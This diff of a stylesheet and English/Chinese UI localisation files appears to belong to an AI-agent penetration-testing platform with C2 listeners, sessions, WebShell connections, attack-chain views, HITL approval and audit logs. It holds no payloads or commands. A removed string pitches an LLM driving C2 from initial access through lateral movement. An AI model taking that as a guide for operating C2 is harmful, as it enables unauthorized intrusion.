top: 0; left: 0; right: 0; bottom: 0; top: 0; left: 0; right: 0; bottom: 0;
background: rgba(15, 23, 42, 0.5); background: rgba(15, 23, 42, 0.52);
backdrop-filter: blur(8px);
-webkit-backdrop-filter: blur(8px);
display: flex; display: flex;
align-items: center; align-items: center;
justify-content: center; justify-content: center;
@@ -1510,7 +1401,8 @@
overflow-y: auto; overflow-y: auto;
box-shadow: var(--c2-shadow-lg); box-shadow: var(--c2-shadow-lg);
border: 1px solid var(--c2-border); border: 1px solid var(--c2-border);
animation: c2-slide-up 0.2s ease-out; animation: c2-slide-up 0.18s ease-out;
contain: layout style paint;
} }
@keyframes c2-slide-up { @keyframes c2-slide-up {
@@ -1532,26 +1424,7 @@
color: var(--c2-text); color: var(--c2-text);
} }
.c2-modal-close { /* .c2-modal-close 样式见 style.css 统一关闭按钮 */
font-size: 18px;
cursor: pointer;
color: var(--c2-text-muted);
background: none;
border: none;
padding: 0;
width: 32px;
height: 32px;
display: flex;
align-items: center;
justify-content: center;
border-radius: var(--c2-radius-xs);
transition: all 0.15s;
}
.c2-modal-close:hover {
background: var(--c2-surface-alt);
color: var(--c2-text);
}
.c2-modal-body { padding: 24px 28px; } .c2-modal-body { padding: 24px 28px; }
@@ -1590,7 +1463,6 @@
border-right: none; border-right: none;
border-bottom: 1px solid var(--c2-border); border-bottom: 1px solid var(--c2-border);
} }
.c2-stats { flex-direction: column; gap: 12px; }
.c2-payload-grid { grid-template-columns: 1fr; } .c2-payload-grid { grid-template-columns: 1fr; }
.c2-listener-grid { grid-template-columns: 1fr; padding: 16px; } .c2-listener-grid { grid-template-columns: 1fr; padding: 16px; }
.c2-task-detail-grid { grid-template-columns: 1fr; } .c2-task-detail-grid { grid-template-columns: 1fr; }
+1896 -262
View File
File diff suppressed because it is too large Load Diff
+158 -12
View File
@@ -79,7 +79,6 @@
"settings": "System settings", "settings": "System settings",
"hitl": "Human-in-the-loop", "hitl": "Human-in-the-loop",
"c2": "C2", "c2": "C2",
"c2Manage": "C2 management",
"c2Listeners": "Listeners", "c2Listeners": "Listeners",
"c2Sessions": "Sessions", "c2Sessions": "Sessions",
"c2Tasks": "Tasks", "c2Tasks": "Tasks",
@@ -98,8 +97,13 @@
"clickToViewTasks": "Click to view tasks", "clickToViewTasks": "Click to view tasks",
"clickToViewVuln": "Click to view vulnerabilities", "clickToViewVuln": "Click to view vulnerabilities",
"clickToViewMCP": "Click to view MCP monitor", "clickToViewMCP": "Click to view MCP monitor",
"accessOverviewTitle": "Access overview",
"accessTabsAria": "C2 and WebShell",
"c2OverviewTitle": "C2 overview", "c2OverviewTitle": "C2 overview",
"c2GoManage": "Open C2 →", "c2GoManage": "Open C2 →",
"webshellGoManage": "Open WebShell →",
"webshellConnections": "Active connections",
"webshellClickConnections": "View connections",
"c2ListenersRunning": "Listeners running", "c2ListenersRunning": "Listeners running",
"c2SessionsOnline": "Sessions online", "c2SessionsOnline": "Sessions online",
"c2TasksPending": "Pending / queued tasks", "c2TasksPending": "Pending / queued tasks",
@@ -153,7 +157,14 @@
"lastUpdated": "Last updated", "lastUpdated": "Last updated",
"viewAll": "View all →", "viewAll": "View all →",
"recentVulns": "Recent vulnerabilities", "recentVulns": "Recent vulnerabilities",
"recentFacts": "Recent facts",
"noVulnYet": "No recent vulnerabilities", "noVulnYet": "No recent vulnerabilities",
"noFactsYet": "No recent facts",
"noFactsDesc": "In project-bound chats, the agent records targets, findings, and attack chains",
"createFirstProjectBtn": "Create first project",
"factProjectMeta": "{{project}} · {{key}}",
"factsAcrossProjects_one": "{{count}} active project · {{facts}} facts",
"factsAcrossProjects_other": "{{count}} active projects · {{facts}} facts",
"capabilities": "Capabilities", "capabilities": "Capabilities",
"mcpTools": "MCP tools", "mcpTools": "MCP tools",
"rolesLabel": "Roles", "rolesLabel": "Roles",
@@ -194,6 +205,7 @@
"statusConfirmed": "Confirmed", "statusConfirmed": "Confirmed",
"statusFixed": "Fixed", "statusFixed": "Fixed",
"statusFalsePositive": "False positive", "statusFalsePositive": "False positive",
"statusIgnored": "Ignored",
"fixRate": "Fix rate", "fixRate": "Fix rate",
"dataStale": "Data may be stale — please refresh", "dataStale": "Data may be stale — please refresh",
"recommendedActions": "Recommended Actions", "recommendedActions": "Recommended Actions",
@@ -230,6 +242,13 @@
"newProjectCta": "+ New project", "newProjectCta": "+ New project",
"projectList": "Project list", "projectList": "Project list",
"searchProjectsPlaceholder": "Search projects…", "searchProjectsPlaceholder": "Search projects…",
"paginationShow": "Show {{start}}-{{end}} of {{total}}",
"paginationRange": "{{start}}-{{end}}/{{total}}",
"paginationTotal": "{{total}} total",
"paginationPage": "{{page}}/{{total}}",
"paginationPerPage": "Per page",
"paginationPrev": "Previous",
"paginationNext": "Next",
"selectOrCreateTitle": "Select or create a project", "selectOrCreateTitle": "Select or create a project",
"selectOrCreateHint": "Projects share a cross-chat fact board; target, environment, auth and other facts are auto-injected in bound conversations.", "selectOrCreateHint": "Projects share a cross-chat fact board; target, environment, auth and other facts are auto-injected in bound conversations.",
"createFirstProject": "Create first project", "createFirstProject": "Create first project",
@@ -267,6 +286,8 @@
"status": "Status", "status": "Status",
"modalNewTitle": "New project", "modalNewTitle": "New project",
"modalNewSubtitle": "After creation, bind conversations to share fact board across chats", "modalNewSubtitle": "After creation, bind conversations to share fact board across chats",
"modalEditTitle": "Edit project",
"modalEditSubtitle": "Update project name and description",
"projectName": "Project name", "projectName": "Project name",
"projectNamePlaceholder": "e.g. Client A Web pentest", "projectNamePlaceholder": "e.g. Client A Web pentest",
"projectDescription": "Project description", "projectDescription": "Project description",
@@ -305,6 +326,9 @@
"statsSparse": "{{count}} incomplete", "statsSparse": "{{count}} incomplete",
"projectNotFound": "Project not found", "projectNotFound": "Project not found",
"updatedPrefix": "Updated {{time}}", "updatedPrefix": "Updated {{time}}",
"descExpand": "Show all",
"descCollapse": "Show less",
"descriptionLengthHint": "Keep it brief (max 4000 chars). Put long logs/POCs in fact board body instead.",
"noMatchingFacts": "No matching facts, try adjusting filters", "noMatchingFacts": "No matching facts, try adjusting filters",
"noFacts": "No facts yet. Click Add fact or let Agent write facts automatically", "noFacts": "No facts yet. Click Add fact or let Agent write facts automatically",
"relatedVulnIdTitle": "Related vulnerability ID", "relatedVulnIdTitle": "Related vulnerability ID",
@@ -377,6 +401,7 @@
"settingsIntroTitle": "Project settings", "settingsIntroTitle": "Project settings",
"settingsIntroHint": "Configure project metadata and Agent authorization boundary; takes effect immediately for bound conversations after saving.", "settingsIntroHint": "Configure project metadata and Agent authorization boundary; takes effect immediately for bound conversations after saving.",
"pinProject": "Pin project (show first in list)", "pinProject": "Pin project (show first in list)",
"pinFact": "Pin fact (prioritize in list and blackboard index)",
"editDescriptionPlaceholder": "Targets, authorization scope, contacts, notes…", "editDescriptionPlaceholder": "Targets, authorization scope, contacts, notes…",
"scopeTitle": "Test scope", "scopeTitle": "Test scope",
"scopeHint": "JSON format for Agent authorization boundary and target assets", "scopeHint": "JSON format for Agent authorization boundary and target assets",
@@ -387,6 +412,10 @@
"dangerZoneTitle": "Danger zone", "dangerZoneTitle": "Danger zone",
"dangerZoneHint": "Archived projects are hidden unless 'Show archived' is enabled; deletion removes all facts permanently.", "dangerZoneHint": "Archived projects are hidden unless 'Show archived' is enabled; deletion removes all facts permanently.",
"archiveRestore": "Archive / Restore", "archiveRestore": "Archive / Restore",
"archiveProject": "Archive",
"editProject": "Edit",
"restoreProjectActive": "Restore to active",
"projectActions": "Project actions",
"deleteProject": "Delete project", "deleteProject": "Delete project",
"saveChangesHint": "Click save to sync changes to server", "saveChangesHint": "Click save to sync changes to server",
"saveSettings": "Save changes", "saveSettings": "Save changes",
@@ -408,6 +437,13 @@
"addGroup": "New group", "addGroup": "New group",
"recentConversations": "Recent conversations", "recentConversations": "Recent conversations",
"batchManage": "Batch manage", "batchManage": "Batch manage",
"paginationShow": "Show {{start}}-{{end}} of {{total}}",
"paginationRange": "{{start}}-{{end}}/{{total}}",
"paginationTotal": "{{total}} total",
"paginationPage": "{{page}}/{{total}}",
"paginationPerPage": "Per page",
"paginationPrev": "Previous",
"paginationNext": "Next",
"attackChain": "Attack chain", "attackChain": "Attack chain",
"viewAttackChain": "View attack chain", "viewAttackChain": "View attack chain",
"selectRole": "Select role", "selectRole": "Select role",
@@ -438,7 +474,7 @@
"noHistoryConversations": "No conversation history yet", "noHistoryConversations": "No conversation history yet",
"renameGroupPrompt": "Please enter new name:", "renameGroupPrompt": "Please enter new name:",
"deleteGroupConfirm": "Are you sure you want to delete this group? Conversations in the group will not be deleted, but will be removed from the group.", "deleteGroupConfirm": "Are you sure you want to delete this group? Conversations in the group will not be deleted, but will be removed from the group.",
"deleteConversationConfirm": "Are you sure you want to delete this conversation?", "deleteConversationConfirm": "Delete this conversation? Chat messages cannot be recovered, but recorded vulnerabilities will remain in the vulnerability library.",
"renameFailed": "Rename failed", "renameFailed": "Rename failed",
"downloadConversationFailed": "Failed to download conversation", "downloadConversationFailed": "Failed to download conversation",
"viewAttackChainSelectConv": "Please select a conversation to view attack chain", "viewAttackChainSelectConv": "Please select a conversation to view attack chain",
@@ -475,6 +511,8 @@
"einoStreamErrorTitle": "⚠️ Eino stream interrupted ({{agent}})", "einoStreamErrorTitle": "⚠️ Eino stream interrupted ({{agent}})",
"einoStreamErrorMessage": "Streaming read failed; the system will retry or terminate according to policy.", "einoStreamErrorMessage": "Streaming read failed; the system will retry or terminate according to policy.",
"einoRunRetryTitle": "🔁 Transient error retry", "einoRunRetryTitle": "🔁 Transient error retry",
"einoEmptyResponseContinueTitle": "🔁 Auto resume (no assistant text)",
"einoEmptyResponseContinueMessage": "Session ended without captured assistant text; resuming from trace…",
"einoRunRetryErrorDetail": "Error detail", "einoRunRetryErrorDetail": "Error detail",
"iterationLimitReachedTitle": "⛔ Iteration limit reached", "iterationLimitReachedTitle": "⛔ Iteration limit reached",
"iterationLimitReachedMessage": "Maximum iteration count reached; automatic iteration has stopped.", "iterationLimitReachedMessage": "Maximum iteration count reached; automatic iteration has stopped.",
@@ -932,6 +970,9 @@
"externalBadge": "External", "externalBadge": "External",
"externalFrom": "External ({{name}})", "externalFrom": "External ({{name}})",
"externalToolFrom": "External MCP - Source: {{name}}", "externalToolFrom": "External MCP - Source: {{name}}",
"clickToViewTools": "Click to view tools from {{name}}",
"filterBySource": "Source: {{name}}",
"clearSourceFilter": "Clear source filter",
"noDescription": "No description", "noDescription": "No description",
"paginationInfo": "{{start}}-{{end}} of {{total}} tools", "paginationInfo": "{{start}}-{{end}} of {{total}} tools",
"perPage": "Per page:", "perPage": "Per page:",
@@ -1042,6 +1083,7 @@
"botAgent": "Bot Agent", "botAgent": "Bot Agent",
"ilinkBotId": "iLink Bot ID (filled after bind)", "ilinkBotId": "iLink Bot ID (filled after bind)",
"boundSuccess": "Binding successful. WeChat bot is enabled.", "boundSuccess": "Binding successful. WeChat bot is enabled.",
"alreadyBound": "This WeChat account is already bound.",
"openLink": "QR not showing? Open link in WeChat on your phone" "openLink": "QR not showing? Open link in WeChat on your phone"
}, },
"wecom": { "wecom": {
@@ -1551,6 +1593,7 @@
"timelineSummary": "{{total}} calls in range · peak {{peak}}", "timelineSummary": "{{total}} calls in range · peak {{peak}}",
"timelineSparseHint": "Most buckets are empty; peak {{peak}} calls at {{peakTime}}", "timelineSparseHint": "Most buckets are empty; peak {{peak}} calls at {{peakTime}}",
"timelineNoData": "No calls in this period", "timelineNoData": "No calls in this period",
"timelineEmptyHint": "Switch the time range or invoke MCP tools in chat or tasks",
"timelineLoadError": "Failed to load call trend", "timelineLoadError": "Failed to load call trend",
"timelineTotalLegend": "Total calls", "timelineTotalLegend": "Total calls",
"timelineFailedLegend": "Failed", "timelineFailedLegend": "Failed",
@@ -1777,6 +1820,7 @@
"statusConfirmed": "Confirmed", "statusConfirmed": "Confirmed",
"statusFixed": "Fixed", "statusFixed": "Fixed",
"statusFalsePositive": "False positive", "statusFalsePositive": "False positive",
"statusIgnored": "Ignored",
"searchVulnId": "Search vuln ID", "searchVulnId": "Search vuln ID",
"searchKeyword": "Search title, description, type, target…", "searchKeyword": "Search title, description, type, target…",
"searchKeywordShort": "Keyword", "searchKeywordShort": "Keyword",
@@ -2043,14 +2087,35 @@
"filterResult": "Result", "filterResult": "Result",
"pageSize": "Per page", "pageSize": "Per page",
"statTotal": "Filtered total", "statTotal": "Filtered total",
"statSuccess": "Success",
"statFailures": "Failures", "statFailures": "Failures",
"statRecent7d": "Last 7 days", "statRecent7d": "Last 7 days",
"retentionHint": "Audit records are kept for {{days}} days, then purged automatically.", "retentionHint": "Audit records are kept for {{days}} days, then purged automatically.",
"disabledHint": "Audit logging is disabled; new actions are not written.", "disabledHint": "Audit logging is disabled; new actions are not written.",
"filterSince": "From", "filterSince": "From",
"filterUntil": "Until", "filterUntil": "Until",
"filterTimeZone": "Timezone: {{tz}} (filter uses your browser's local time)",
"datetimePlaceholder": "Select date & time",
"timePresets": "Quick range",
"preset15m": "Last 15 min",
"preset1h": "Last 1 hour",
"preset24h": "Last 24 hours",
"preset7d": "Last 7 days",
"presetToday": "Today",
"pickerHour": "Hour",
"pickerMinute": "Min",
"pickerClear": "Clear",
"pickerToday": "Today",
"pickerConfirm": "OK",
"filterQuery": "Keyword", "filterQuery": "Keyword",
"filterQueryPlaceholder": "Message / resource ID / action", "filterQueryPlaceholder": "Message / resource ID / action",
"colTime": "Time",
"colMessage": "Message",
"colCategory": "Category",
"colAction": "Action",
"colResult": "Result",
"colIp": "IP",
"colResource": "Resource ID",
"cat": { "cat": {
"auth": "Auth", "auth": "Auth",
"config": "Config", "config": "Config",
@@ -2123,6 +2188,93 @@
"exportDone": "Export complete", "exportDone": "Export complete",
"loading": "Loading...", "loading": "Loading...",
"empty": "No audit records", "empty": "No audit records",
"result": {
"success": "success",
"failure": "failure"
},
"msg": {
"auth": {
"login": "Login successful",
"login_failed": "Login failed: incorrect password",
"logout": "Logged out",
"change_password": "Login password changed",
"change_password_failed": "Password change failed: current password incorrect"
},
"config": {
"apply": "Configuration applied",
"update": "In-memory configuration updated",
"apply_fail_kb_init": "Failed to apply config: knowledge base init",
"apply_fail_kb_reinit": "Failed to apply config: knowledge base re-init",
"apply_fail_c2": "Failed to apply config: C2"
},
"conversation": {
"create": "Conversation created",
"delete": "Conversation deleted",
"delete_turn": "Conversation turn deleted"
},
"c2": {
"listener_create": "C2 listener created",
"listener_delete": "C2 listener deleted",
"listener_start": "C2 listener started",
"listener_stop": "C2 listener stopped",
"session_delete": "C2 session deleted",
"task_create": "C2 task created",
"task_cancel": "C2 task cancelled",
"task_delete": "C2 tasks deleted (batch)"
},
"webshell": {
"connection_create": "WebShell connection created",
"connection_delete": "WebShell connection deleted"
},
"knowledge": {
"item_delete": "Knowledge item deleted",
"index_rebuild": "Knowledge index rebuilt"
},
"vulnerability": {
"create": "Vulnerability record created",
"update": "Vulnerability record updated",
"delete": "Vulnerability record deleted",
"delete_batch": "Vulnerability records deleted (batch)"
},
"external_mcp": {
"upsert": "External MCP configuration updated",
"delete": "External MCP configuration deleted"
},
"task": {
"create_queue": "Batch task queue created",
"start_queue": "Batch task queue started",
"delete_queue": "Batch task queue deleted",
"pause_queue": "Batch task queue paused",
"rerun_queue": "Batch task queue rerun",
"delete_batch_task": "Batch subtask deleted"
},
"tool": {
"execution_delete": "Tool execution record deleted",
"execution_delete_batch": "Tool execution records deleted (batch)"
},
"file": {
"upload": "Chat attachment uploaded",
"delete": "Chat attachment deleted"
},
"hitl": {
"decision": "HITL approval decision"
},
"role": {
"create": "Role created",
"update": "Role updated",
"delete": "Role deleted"
},
"skill": {
"create": "Skill created",
"update": "Skill updated",
"delete": "Skill deleted"
},
"agent": {
"markdown_create": "Markdown sub-agent created",
"markdown_update": "Markdown sub-agent updated",
"markdown_delete": "Markdown sub-agent deleted"
}
},
"paginationShow": "{{start}}-{{end}} of {{total}}", "paginationShow": "{{start}}-{{end}} of {{total}}",
"detailTitle": "Audit detail", "detailTitle": "Audit detail",
"detailTime": "Time", "detailTime": "Time",
@@ -2201,7 +2353,8 @@
"copyContent": "Copy content", "copyContent": "Copy content",
"correctInfo": "Correct info", "correctInfo": "Correct info",
"errorInfo": "Error info", "errorInfo": "Error info",
"copyError": "Copy error" "copyError": "Copy error",
"contentTruncated": "… (display truncated; use read_file on the path in persisted-output for the full file)"
}, },
"attackChainModal": { "attackChainModal": {
"title": "Attack chain", "title": "Attack chain",
@@ -2293,7 +2446,7 @@
"selectAll": "Select all", "selectAll": "Select all",
"deleteSelected": "Delete selected", "deleteSelected": "Delete selected",
"confirmDeleteNone": "Please select at least one conversation to delete", "confirmDeleteNone": "Please select at least one conversation to delete",
"confirmDeleteN": "Delete {{count}} selected conversation(s)?", "confirmDeleteN": "Delete {{count}} selected conversation(s)? Chat messages cannot be recovered, but recorded vulnerabilities will remain in the vulnerability library.",
"deleteFailed": "Delete failed", "deleteFailed": "Delete failed",
"unnamedConversation": "Unnamed conversation" "unnamedConversation": "Unnamed conversation"
}, },
@@ -2439,6 +2592,7 @@
"statusConfirmed": "Confirmed", "statusConfirmed": "Confirmed",
"statusFixed": "Fixed", "statusFixed": "Fixed",
"statusFalsePositive": "False positive", "statusFalsePositive": "False positive",
"statusIgnored": "Ignored",
"type": "Vulnerability type", "type": "Vulnerability type",
"typePlaceholder": "e.g. SQL injection, XSS, CSRF", "typePlaceholder": "e.g. SQL injection, XSS, CSRF",
"target": "Target", "target": "Target",
@@ -2529,14 +2683,6 @@
"checkboxLinkTitle": "Check to link this tool to this role" "checkboxLinkTitle": "Check to link this tool to this role"
}, },
"c2": { "c2": {
"title": "C2 Management",
"welcomeTitle": "AI-Native C2 Framework",
"welcomeDesc": "MCP-native design: let LLM call C2 like calling nmap to complete the full chain: initial access → control → tasks → lateral movement → cleanup",
"statListeners": "Running Listeners",
"statSessions": "Online Sessions",
"statPending": "Pending Tasks",
"goListeners": "Manage Listeners",
"goSessions": "View Sessions",
"clipboardCopied": "Copied to clipboard", "clipboardCopied": "Copied to clipboard",
"fmt": { "fmt": {
"durationMs": "{{n}}ms", "durationMs": "{{n}}ms",
+157 -12
View File
@@ -79,7 +79,6 @@
"settings": "系统设置", "settings": "系统设置",
"hitl": "人机协同", "hitl": "人机协同",
"c2": "C2", "c2": "C2",
"c2Manage": "C2 管理",
"c2Listeners": "监听器", "c2Listeners": "监听器",
"c2Sessions": "会话", "c2Sessions": "会话",
"c2Tasks": "任务", "c2Tasks": "任务",
@@ -98,8 +97,13 @@
"clickToViewTasks": "点击查看任务管理", "clickToViewTasks": "点击查看任务管理",
"clickToViewVuln": "点击查看漏洞管理", "clickToViewVuln": "点击查看漏洞管理",
"clickToViewMCP": "点击查看 MCP 监控", "clickToViewMCP": "点击查看 MCP 监控",
"accessOverviewTitle": "接入概览",
"accessTabsAria": "C2 与 WebShell",
"c2OverviewTitle": "C2 概览", "c2OverviewTitle": "C2 概览",
"c2GoManage": "进入 C2 →", "c2GoManage": "进入 C2 →",
"webshellGoManage": "进入 WebShell →",
"webshellConnections": "活跃连接",
"webshellClickConnections": "查看连接",
"c2ListenersRunning": "运行中监听器", "c2ListenersRunning": "运行中监听器",
"c2SessionsOnline": "在线会话", "c2SessionsOnline": "在线会话",
"c2TasksPending": "待审 / 排队任务", "c2TasksPending": "待审 / 排队任务",
@@ -153,7 +157,13 @@
"lastUpdated": "上次更新", "lastUpdated": "上次更新",
"viewAll": "查看全部 →", "viewAll": "查看全部 →",
"recentVulns": "最近漏洞", "recentVulns": "最近漏洞",
"recentFacts": "近期事实",
"noVulnYet": "暂无最近漏洞", "noVulnYet": "暂无最近漏洞",
"noFactsYet": "暂无近期事实",
"noFactsDesc": "在绑定项目的对话中,Agent 会自动记录目标、漏洞、攻击链等事实",
"createFirstProjectBtn": "创建第一个项目",
"factProjectMeta": "{{project}} · {{key}}",
"factsAcrossProjects": "{{count}} 个活跃项目 · {{facts}} 条事实",
"capabilities": "能力总览", "capabilities": "能力总览",
"mcpTools": "MCP 工具", "mcpTools": "MCP 工具",
"rolesLabel": "角色", "rolesLabel": "角色",
@@ -188,6 +198,7 @@
"statusConfirmed": "已确认", "statusConfirmed": "已确认",
"statusFixed": "已修复", "statusFixed": "已修复",
"statusFalsePositive": "误报", "statusFalsePositive": "误报",
"statusIgnored": "已忽略",
"fixRate": "修复率", "fixRate": "修复率",
"dataStale": "数据可能已过期,请手动刷新", "dataStale": "数据可能已过期,请手动刷新",
"recommendedActions": "推荐操作", "recommendedActions": "推荐操作",
@@ -219,6 +230,13 @@
"newProjectCta": "+ 新建项目", "newProjectCta": "+ 新建项目",
"projectList": "项目列表", "projectList": "项目列表",
"searchProjectsPlaceholder": "搜索项目…", "searchProjectsPlaceholder": "搜索项目…",
"paginationShow": "显示 {{start}}-{{end}} / 共 {{total}}",
"paginationRange": "{{start}}-{{end}}/{{total}}",
"paginationTotal": "共 {{total}} 条",
"paginationPage": "{{page}}/{{total}}",
"paginationPerPage": "每页",
"paginationPrev": "上一页",
"paginationNext": "下一页",
"selectOrCreateTitle": "选择或创建项目", "selectOrCreateTitle": "选择或创建项目",
"selectOrCreateHint": "项目用于跨对话共享「事实黑板」:目标、环境、认证等信息会在绑定项目的对话中自动注入。", "selectOrCreateHint": "项目用于跨对话共享「事实黑板」:目标、环境、认证等信息会在绑定项目的对话中自动注入。",
"createFirstProject": "创建第一个项目", "createFirstProject": "创建第一个项目",
@@ -256,6 +274,8 @@
"status": "状态", "status": "状态",
"modalNewTitle": "新建项目", "modalNewTitle": "新建项目",
"modalNewSubtitle": "创建后可绑定对话,跨会话共享事实黑板", "modalNewSubtitle": "创建后可绑定对话,跨会话共享事实黑板",
"modalEditTitle": "编辑项目",
"modalEditSubtitle": "修改项目名称与描述",
"projectName": "项目名称", "projectName": "项目名称",
"projectNamePlaceholder": "例如:某客户 Web 渗透", "projectNamePlaceholder": "例如:某客户 Web 渗透",
"projectDescription": "项目描述", "projectDescription": "项目描述",
@@ -294,6 +314,9 @@
"statsSparse": "{{count}} 待补全", "statsSparse": "{{count}} 待补全",
"projectNotFound": "项目不存在", "projectNotFound": "项目不存在",
"updatedPrefix": "更新于 {{time}}", "updatedPrefix": "更新于 {{time}}",
"descExpand": "展开全部",
"descCollapse": "收起",
"descriptionLengthHint": "简要说明即可(最多 4000 字);大段日志/POC 请写入事实黑板 body",
"noMatchingFacts": "无匹配事实,请调整筛选条件", "noMatchingFacts": "无匹配事实,请调整筛选条件",
"noFacts": "暂无事实,点击「添加事实」或由 Agent 自动写入", "noFacts": "暂无事实,点击「添加事实」或由 Agent 自动写入",
"relatedVulnIdTitle": "关联漏洞 ID", "relatedVulnIdTitle": "关联漏洞 ID",
@@ -366,6 +389,7 @@
"settingsIntroTitle": "项目设置", "settingsIntroTitle": "项目设置",
"settingsIntroHint": "配置项目元数据与 Agent 授权边界,保存后即时生效于绑定对话。", "settingsIntroHint": "配置项目元数据与 Agent 授权边界,保存后即时生效于绑定对话。",
"pinProject": "置顶项目(列表优先显示)", "pinProject": "置顶项目(列表优先显示)",
"pinFact": "置顶事实(列表与黑板索引优先)",
"editDescriptionPlaceholder": "测试目标、授权范围、联系人、注意事项…", "editDescriptionPlaceholder": "测试目标、授权范围、联系人、注意事项…",
"scopeTitle": "测试范围", "scopeTitle": "测试范围",
"scopeHint": "JSON 格式,供 Agent 理解授权边界与目标资产", "scopeHint": "JSON 格式,供 Agent 理解授权边界与目标资产",
@@ -376,6 +400,10 @@
"dangerZoneTitle": "危险操作", "dangerZoneTitle": "危险操作",
"dangerZoneHint": "归档后需在列表勾选「显示已归档」才能查看;删除将清除全部事实且不可恢复。", "dangerZoneHint": "归档后需在列表勾选「显示已归档」才能查看;删除将清除全部事实且不可恢复。",
"archiveRestore": "归档 / 恢复", "archiveRestore": "归档 / 恢复",
"archiveProject": "归档",
"editProject": "编辑",
"restoreProjectActive": "恢复为进行中",
"projectActions": "项目操作",
"deleteProject": "删除项目", "deleteProject": "删除项目",
"saveChangesHint": "修改后请点击保存以同步到服务器", "saveChangesHint": "修改后请点击保存以同步到服务器",
"saveSettings": "保存更改", "saveSettings": "保存更改",
@@ -397,6 +425,13 @@
"addGroup": "新建分组", "addGroup": "新建分组",
"recentConversations": "最近对话", "recentConversations": "最近对话",
"batchManage": "批量管理", "batchManage": "批量管理",
"paginationShow": "显示 {{start}}-{{end}} / 共 {{total}}",
"paginationRange": "{{start}}-{{end}}/{{total}}",
"paginationTotal": "共 {{total}} 条",
"paginationPage": "{{page}}/{{total}}",
"paginationPerPage": "每页",
"paginationPrev": "上一页",
"paginationNext": "下一页",
"attackChain": "攻击链", "attackChain": "攻击链",
"viewAttackChain": "查看攻击链", "viewAttackChain": "查看攻击链",
"selectRole": "选择角色", "selectRole": "选择角色",
@@ -427,7 +462,7 @@
"noHistoryConversations": "暂无历史对话", "noHistoryConversations": "暂无历史对话",
"renameGroupPrompt": "请输入新名称:", "renameGroupPrompt": "请输入新名称:",
"deleteGroupConfirm": "确定要删除此分组吗?分组中的对话不会被删除,但会从分组中移除。", "deleteGroupConfirm": "确定要删除此分组吗?分组中的对话不会被删除,但会从分组中移除。",
"deleteConversationConfirm": "确定要删除此对话吗?", "deleteConversationConfirm": "确定要删除此对话吗?对话消息将不可恢复,但已记录的漏洞会保留在漏洞库中。",
"renameFailed": "重命名失败", "renameFailed": "重命名失败",
"downloadConversationFailed": "下载对话失败", "downloadConversationFailed": "下载对话失败",
"viewAttackChainSelectConv": "请选择一个对话以查看攻击链", "viewAttackChainSelectConv": "请选择一个对话以查看攻击链",
@@ -464,6 +499,8 @@
"einoStreamErrorTitle": "⚠️ Eino 流式中断({{agent}}", "einoStreamErrorTitle": "⚠️ Eino 流式中断({{agent}}",
"einoStreamErrorMessage": "流式读取异常,系统将按策略重试或结束。", "einoStreamErrorMessage": "流式读取异常,系统将按策略重试或结束。",
"einoRunRetryTitle": "🔁 临时错误重试", "einoRunRetryTitle": "🔁 临时错误重试",
"einoEmptyResponseContinueTitle": "🔁 自动续跑(无助手正文)",
"einoEmptyResponseContinueMessage": "会话已结束但未捕获到助手正文,正在基于轨迹自动续跑…",
"einoRunRetryErrorDetail": "具体报错", "einoRunRetryErrorDetail": "具体报错",
"iterationLimitReachedTitle": "⛔ 达到迭代上限", "iterationLimitReachedTitle": "⛔ 达到迭代上限",
"iterationLimitReachedMessage": "已达到最大迭代次数,任务已停止继续自动迭代。", "iterationLimitReachedMessage": "已达到最大迭代次数,任务已停止继续自动迭代。",
@@ -921,6 +958,9 @@
"externalBadge": "外部", "externalBadge": "外部",
"externalFrom": "外部 ({{name}})", "externalFrom": "外部 ({{name}})",
"externalToolFrom": "外部MCP工具 - 来源:{{name}}", "externalToolFrom": "外部MCP工具 - 来源:{{name}}",
"clickToViewTools": "点击查看 {{name}} 的工具",
"filterBySource": "来源: {{name}}",
"clearSourceFilter": "清除来源筛选",
"noDescription": "无描述", "noDescription": "无描述",
"paginationInfo": "显示 {{start}}-{{end}} / 共 {{total}} 个工具", "paginationInfo": "显示 {{start}}-{{end}} / 共 {{total}} 个工具",
"perPage": "每页:", "perPage": "每页:",
@@ -1031,6 +1071,7 @@
"botAgent": "Bot Agent", "botAgent": "Bot Agent",
"ilinkBotId": "iLink Bot ID(绑定后自动填充)", "ilinkBotId": "iLink Bot ID(绑定后自动填充)",
"boundSuccess": "绑定成功,微信机器人已启用。", "boundSuccess": "绑定成功,微信机器人已启用。",
"alreadyBound": "该微信已绑定过,无需重复绑定。",
"openLink": "无法显示二维码?点击用手机微信打开链接" "openLink": "无法显示二维码?点击用手机微信打开链接"
}, },
"wecom": { "wecom": {
@@ -1540,6 +1581,7 @@
"timelineSummary": "区间内 {{total}} 次 · 峰值 {{peak}}", "timelineSummary": "区间内 {{total}} 次 · 峰值 {{peak}}",
"timelineSparseHint": "该时段多数时间为 0,峰值 {{peak}} 次出现在 {{peakTime}}", "timelineSparseHint": "该时段多数时间为 0,峰值 {{peak}} 次出现在 {{peakTime}}",
"timelineNoData": "该时段暂无调用", "timelineNoData": "该时段暂无调用",
"timelineEmptyHint": "切换时间范围查看其他时段,或在对话/任务中调用 MCP 工具",
"timelineLoadError": "无法加载调用趋势", "timelineLoadError": "无法加载调用趋势",
"timelineTotalLegend": "总调用", "timelineTotalLegend": "总调用",
"timelineFailedLegend": "失败", "timelineFailedLegend": "失败",
@@ -1766,6 +1808,7 @@
"statusConfirmed": "已确认", "statusConfirmed": "已确认",
"statusFixed": "已修复", "statusFixed": "已修复",
"statusFalsePositive": "误报", "statusFalsePositive": "误报",
"statusIgnored": "已忽略",
"searchVulnId": "搜索漏洞 ID", "searchVulnId": "搜索漏洞 ID",
"searchKeyword": "搜索标题、描述、类型、目标…", "searchKeyword": "搜索标题、描述、类型、目标…",
"searchKeywordShort": "关键词", "searchKeywordShort": "关键词",
@@ -2032,14 +2075,35 @@
"filterResult": "结果", "filterResult": "结果",
"pageSize": "每页", "pageSize": "每页",
"statTotal": "当前筛选", "statTotal": "当前筛选",
"statSuccess": "成功",
"statFailures": "失败", "statFailures": "失败",
"statRecent7d": "近 7 天", "statRecent7d": "近 7 天",
"retentionHint": "审计记录保留 {{days}} 天,超期自动清理。", "retentionHint": "审计记录保留 {{days}} 天,超期自动清理。",
"disabledHint": "审计功能已关闭,新操作不会写入审计表。", "disabledHint": "审计功能已关闭,新操作不会写入审计表。",
"filterSince": "开始时间", "filterSince": "开始时间",
"filterUntil": "结束时间", "filterUntil": "结束时间",
"filterTimeZone": "时区:{{tz}}(筛选按浏览器本地时间)",
"datetimePlaceholder": "选择日期时间",
"timePresets": "快捷",
"preset15m": "最近15分钟",
"preset1h": "最近1小时",
"preset24h": "最近24小时",
